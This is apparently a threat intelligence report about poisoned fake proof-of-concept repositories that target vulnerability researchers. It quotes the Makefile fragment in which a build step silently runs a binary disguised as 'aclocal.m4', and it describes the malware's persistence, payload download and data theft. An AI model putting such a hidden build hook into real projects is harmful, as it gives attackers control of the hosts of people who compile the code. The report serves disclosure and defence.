NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.
Up to now, two code repositories containing malicious code and the CnC address are still alive, which means that it remains an ongoing attack.
From the submission records, it can be found that the attacker has uploaded relevant malicious codes multiple times from the end of June 2023.
The attack intention was revealed two days after the malicious code was uploaded, and repo users disputed an allegation in the issue that this PoC is fake and malicious code is implanted.
Analysis of Techniques and Tactics
Poisoning of disguised compiled configuration files
From the perspective of supply chain security, attackers used code poisoning to carry out attacks in the process of code compilation. Instead of hosting the binary payload in a repository, as is often the case for phishing, implanting malicious code and compiling configuration files are undoubtedly more subtle.
CFLAGS= -I./inc LDFLAGS= -pthread -static all: obj $(TARGET) get_root $(TARGET): $(OBJECTS) $(CC) $(LDFLAGS) -o $@ $^ strip $@ ./src/aclocal.m4 <--Execute malicious programs contained in the repository
The Makefile compilation configuration file contains the commands required to compile and generate binaries, and an attacker inserts the process of executing the file aclocal.m4 in the src directory during the normal compilation flow. This file is actually a default configuration file in GNU automake, which is renamed to deceive the victim. The file aclocal.m4 itself is a malicious program for Linux systems. Once the user executes the make command, the compilation project will be enabled.
aclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU/Linux 3.2.0, stripped
Multistage Malicious Sample kworker with Built-in Defense Evasion Feature
Copy itself to the HOME directory and add persistence at first execution
Defense Evasion: timestamp modification; attacker connection through timestamp forgery
Pull the content from the hardcoded URL and decrypt it.
During the test, it was found that when a request is made incorrectly, the attacker server returns empty content and blacklists the requested IP address.
The real content requested is a bash script . On the one hand, this bash script collects information and uploads it to the public repository, and then sends it back to the repository for linking to the server; on the other hand, it realizes persistence and continuous control through SSH.
As of this article, NSFOCUS Threat Intelligence has supported detection and alert on threat intelligence of involved infrastructure. Some NSFOCUS’s products have captured attack events using the malware.
In recent years, similar attacks targeting vulnerability researchers and red team members by using vulnerability exploits as baits are not uncommon. However, compared with the previous method of baiting malicious EXE files, implanting malicious codes in compiled configuration files makes the exploitation chain that triggers malicious behaviors during compilation more covert. However, it requires the victim to have the vulnerability EXP command line compilation ability, which undoubtedly screens out a number of people who are used to executing vulnerability exploitation programs simply downloaded on the Internet, which means that the target has been shifted to vulnerability researchers or red team members capable of weaponizing vulnerabilities.
Based on the existing intelligence and preliminary detection of the attacker’s infrastructure, we believe that this code poisoning attack could be long-simmered and a part of a persistent attack: select a small project with low attention and low stars to test the feasibility, and collect necessary information for later intended activities.
Malicious Github Repo:
Malicious sample kworker SHA256: caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c
Payload delivery, CnC address:
For anyone that has ran this PoC, consider your data stolen. This is what eventually runs on your host after a few stages. If you wanna analyse it, don't use a web browser or your IP will get blacklisted. #CVE_2023_35829 #backdoor https://t.co/gafdPfDc0r pic.twitter.com/fUIqclSARX— Andrei Scutariu (@xnand_) July 4, 2023